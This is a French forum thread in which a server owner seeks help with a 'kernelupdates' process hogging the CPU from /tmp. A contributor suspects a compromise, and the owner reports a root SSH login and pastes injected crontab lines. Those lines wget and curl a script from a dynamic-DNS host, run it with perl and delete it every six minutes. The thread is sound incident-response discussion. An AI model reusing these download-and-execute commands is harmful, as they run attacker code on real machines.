Kernelupdates utilise 161 % du CPU voir plus
yazou
Messages postés
95
Statut
Membre
-
ElementW Messages postés 5690 Statut Contributeur -
ElementW Messages postés 5690 Statut Contributeur -
Bonjour,
J'ai un service kernelupdates qui tourne en permanence et qui utilise beaucoup de ressources.
Je reçois aussi constamment des alertes mails sur ma boite :
Comment faire pour définitivement l'arrêter ?
Merci
J'ai un service kernelupdates qui tourne en permanence et qui utilise beaucoup de ressources.
top - 10:00:20 up 1 day, 22:23, 1 user, load average: 3.43, 2.68, 2.45
Tasks: 137 total, 1 running, 136 sleeping, 0 stopped, 0 zombie
Cpu(s): 17.8%us, 1.3%sy, 80.9%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 2038696k total, 1952192k used, 86504k free, 65312k buffers
Swap: 8189936k total, 0k used, 8189936k free, 913148k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
10474 root 20 0 116m 1532 708 S 161 0.1 4976:05 kernelupdates
Je reçois aussi constamment des alertes mails sur ma boite :
File: /tmp/.ice-unix/kernelupdates
Reason: Linux Binary
Owner: :lshellg (1000:1000)
Action: No action taken
Comment faire pour définitivement l'arrêter ?
Merci
A voir également:
- Kernelupdates utilise 161 % du CPU voir plus
- Temperature cpu - Guide
- Voir sa maison sur google street view - Guide
- Voir qui regarde mon profil facebook - Guide
- Cpu burner - Télécharger - Optimisation
- Cpu stress - Télécharger - Informations & Diagnostic
1 réponse
'lut, peut-tu récupérer ce fichier de ton serveur sur ton PC (sans le lancer évidemment; juste pour l'avoir et éventuellement l'analyser)?
Comme une recherche Google ne donne rien de probant, et au vu de l'activité CPU, je suspecte que ça soit un rootkit ou un autre programme malveillant qui aurait été installé par une faille quelconque qui aurait permis a un attaquant d'obtenir un shell sur ton serveur...
Si c'est possible, peut-tu avoir des stats de quand et comment le processus a été lancé?
Comme une recherche Google ne donne rien de probant, et au vu de l'activité CPU, je suspecte que ça soit un rootkit ou un autre programme malveillant qui aurait été installé par une faille quelconque qui aurait permis a un attaquant d'obtenir un shell sur ton serveur...
Si c'est possible, peut-tu avoir des stats de quand et comment le processus a été lancé?
J'ai reçu une alerte bizare il y a quelques jours, comme quoi une personne a réussi à se connecter en root :
lfd on xxxx.ovh.net: SSH login alert for user root from 85.250.124.124 (IL/Israel/85-250-124-124.bb.netvision.net.il)
lorsque j'ai tapé kill + numéro du processus correspondant à kernelupdate, tout est redevenu normal.
J'ai aussi bloqué l'adresse ip en question. Mais j'aimerais bien savoir comment me débarasser définitivement de cette menace.
Quelle est la commande à taper pour avoir des stats relatifs au process ? Désolé si cette question paraît triviale mais je n'ai pas de compétences très poussées en admin serveur.
Une IP d'Israël, m'étonne pas. Vérifie tous les logs, ceux de tes CMS (Drupal&WP), ceux du serveur (ceux d'apache sont généralement dans ou ) et sauvegarde-les; va falloir faire de la lecture pour savoir ou le pirate est passé pour avoir du root... Et le fait qu'il ait eu un accès root est très mauvais signe.
Line 9331: May 21 15:42:01 nsxxxx/USR/SBIN/CRON[44335]: (root) CMD (cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*)
et en tapant : crontab -e
Je vois des lignes que je n'ai pas ajouté, les voici : *
*/6 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
J'avais pensé virer "rm -f abc*" de sa ligne pour voir le contenu de ce ficher.
J'ai aussi trouvé un topic peut être utile...
https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server